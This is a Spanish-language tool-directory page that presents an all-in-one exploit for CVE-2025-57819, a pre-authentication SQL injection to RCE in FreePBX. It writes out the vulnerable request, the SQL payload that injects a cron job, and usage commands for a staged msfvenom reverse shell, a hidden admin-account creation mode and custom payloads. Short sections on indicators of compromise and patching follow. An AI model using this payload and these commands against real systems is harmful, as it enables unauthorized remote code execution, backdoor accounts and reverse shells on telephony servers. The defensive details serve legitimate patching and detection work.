Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-57819-exploit — FreePBX Pre-Auth SQLi a RCE (CVE-2025-57819) — Exploit Todo-en-Uno | Kitploit
Herramientas/GitHubGitHub/jeanback1/cve-2025-57819-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubjeanback1/cve-2025-57819-exploit

CVE-2025-57819-exploit

FreePBX Pre-Auth SQLi a RCE (CVE-2025-57819) — Exploit Todo-en-Uno

Ver Repositorio
2hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-57819 — SQLi de pre-autenticación a RCE en FreePBX

Un exploit todo-en-uno para CVE-2025-57819, una inyección SQL no autenticada en el módulo endpoint de FreePBX que conduce a la ejecución remota de código mediante la inyección de trabajos cron.

  • CVSS: 9.8 (Crítico) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CISA KEV: Añadido el 29 de agosto de 2025
  • Afectados: Sangoma FreePBX 15, 16, 17 con módulo endpoint < 15.0.66 / < 16.0.89 / < 17.0.3
  • Corregido en: endpoint 15.0.66, 16.0.89, 17.0.3

Resumen de la vulnerabilidad

FreePBX expone el endpoint admin/ajax.php?module=FreePBX\modules\endpoint\ajax sin requerir autenticación (CWE-288). El parámetro brand se pasa directamente a las consultas SQL sin saneamiento (CWE-89), lo que permite a un atacante inyectar sentencias SQL arbitrarias en la base de datos asterisk.

Cadena de ataque

root@kitploit:~
[Solicitud HTTP no autenticada]
        │
        ▼
admin/ajax.php?module=FreePBX\...\ajax&command=model&brand=<SQLi>
        │
        ▼
Inyección SQL en la tabla `cron_jobs`
(INSERT con comando controlado por el atacante, schedule="* * * * *")
        │
        ▼
En ~60 segundos, el demonio cron ejecuta el comando como el usuario `asterisk`
        │
        ▼
Ejecución Remota de Código

Capacidades del exploit

Este exploit admite tres modos:

1. Reverse Shell por etapas (por defecto)

  1. Genera un binario linux/x64/shell_reverse_tcp mediante msfvenom
  2. Inicia un servidor HTTP para servir el binario
  3. Inicia un listener TCP para la shell
  4. Inyecta un trabajo cron vía SQLi que descarga + ejecuta el binario
  5. Cuando el cron se dispara, obtienes una shell interactiva
  6. Limpia el trabajo cron inyectado al salir
root@kitploit:~
python3 cve_2025_57819_aio.py <target_url> <lhost> <lport>

Ejemplo:

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452

Este ejemplo usa el puerto 4452 para la reverse shell y el 4453 para el servidor HTTP de la etapa.

2. Creación de usuario administrador (--create-user)

Crea una nueva cuenta de administrador de FreePBX vía SQLi. Sin reverse shell, sin conexión de retorno, sin necesidad de binarios.

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal --create-user

3. Payload personalizado (--payload <path>)

Usa tu propio binario ELF en lugar de generar uno con msfvenom.

root@kitploit:~
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452 \
    --payload /path/to/custom_shell.elf

Requisitos

  • Python 3.6+
  • Librería requests (pip install requests)
  • Para el modo por etapas: Metasploit (msfvenom) o un payload personalizado con --payload
  • Para el modo --create-user: Nada más que Python + requests

Cómo funciona

Vector de inyección SQL

El endpoint vulnerable es:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=XXX&model=XXX&brand=<SQLi>

El parámetro brand se concatena en un INSERT SQL sin saneamiento. El exploit construye la inyección como:

root@kitploit:~
';INSERT INTO cron_jobs (modulename,jobname,command,...) VALUES ('X','Y','<CMD>',NULL,'* * * * *',30,1,1) --

El -- final comenta el resto de la consulta original.

Ejecución del cron

FreePBX usa el subsistema cron de Asterisk. Los trabajos cron se revisan cada minuto. Cuando la programación del trabajo insertado (* * * * *) coincide, el comando se ejecuta como el usuario del sistema asterisk.

Limpieza

Después de que la sesión termina (o por timeout), el exploit envía un DELETE vía SQLi para eliminar el trabajo cron inyectado de cron_jobs.

Indicadores de compromiso

  • Entradas inesperadas en asterisk.cron_jobs con nombres aleatorios de módulo/trabajo
  • Solicitudes HTTP salientes desde el servidor FreePBX hacia IPs externas en puertos altos
  • Conexiones reverse shell desde el usuario asterisk
  • Cuentas de administrador nuevas y aleatorias en ampusers (si se usa el modo --create-user)

Mitigación

Actualiza el módulo endpoint a las versiones corregidas:

  • 15: >= 15.0.66
  • 16: >= 16.0.89
  • 17: >= 17.0.3

Referencias

  • NVD — CVE-2025-57819
  • GitHub Security Advisory — GHSA-m42g-xg4c-5f3h
  • CISA Known Exploited Vulnerabilities
  • watchTowr Labs
  • Aviso de la comunidad de FreePBX

Descargo de responsabilidad

Este software se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado contra sistemas que no posees o para los cuales no tienes permiso explícito para realizar pruebas es ilegal. El autor no es responsable de ningún uso indebido.

Descargar herramienta